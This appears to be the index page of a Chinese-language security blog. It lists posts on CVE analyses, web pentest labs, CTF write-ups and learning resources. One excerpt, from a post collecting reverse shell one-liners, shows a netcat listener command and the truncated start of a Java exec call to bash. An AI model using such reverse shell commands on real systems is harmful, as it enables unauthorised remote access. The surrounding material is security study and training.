因上努力 果上求缘
CVE-2020-13277 漏洞分析 CVE-2020-13277 漏洞分析
An authorization issue in the mirroring logic allowed read access to private repositories in GitLab CE/EE 10.6 and later through 13.0.5
2020-11-09
CVE-2020-13933 漏洞分析 CVE-2020-13933 漏洞分析
Apache Shiro < 1.6.0 身份验证绕过漏洞: Apache Shiro 是一个强大且易用的 Java 安全框架,执行身份验证、授权、密码和会话管理,通常会和 spring 等框架一起搭配使用来开发 web 应用
2020-09-09
各种语言的一句话反弹 shell 命令 各种语言的一句话反弹 shell 命令
被攻击主机先监听端口这是大前提,至于怎么做就看 hacker 的能力了,最简单脚本可以用 nc : nc -lvvp 9527 攻击主机连接到服务端口JAVARuntime.getRuntime().exec(["/bin/bash","-
2020-08-17
威胁情报播报 威胁情报播报
从 360、奇安信、红后、绿盟、安全客、斗象 等公开来源爬取并整合最新的威胁情报信息,并实时推送到 邮箱、订阅号、QQ 群
2020-05-01
如何令永假式成真? 如何令永假式成真?
最近在 Stack Overflow 无意中发现一个挺有意思的问题: 是否可以令永假式 a == 1 && a == 2 && a == 3 的值为 true ?** C++当时看到题干,条件反射就想到了
2020-03-27
WEB 渗透靶场整合 WEB 渗透靶场整合
DVWA推荐新手首选靶场,配置简单,需下载 phpstudy 和靶场文件包,简单部署之后即可访问。 包含了常见的web漏洞(php的),每个漏洞分为四个等级,每个等级都有源码查看,最高等级的源码是最安全的。 DVWA靶场源码下载:http
2019-10-22
CTF 解题报告 CTF 解题报告
Root Me、 XSS Game、 prompt(1) to win、 alert(1) to win、 RedTiger's Hackit、 sqli-labs、 CG-CTF、 xss-quiz、 upload-labs、 BugkuCTF
2019-02-10
白帽子渗透测试入门资源:参考书、课程、工具、认证 白帽子渗透测试入门资源:参考书、课程、工具、认证
前言初入渗透测试领域,过程中遇到不少错综复杂的知识,也遇到不少坑,特此记录,慢慢整理慢慢填。 名词解析 名词 全称 解析 PwK Penetration Testing with Kali Linux Kali-Linux 渗透测
2018-12-16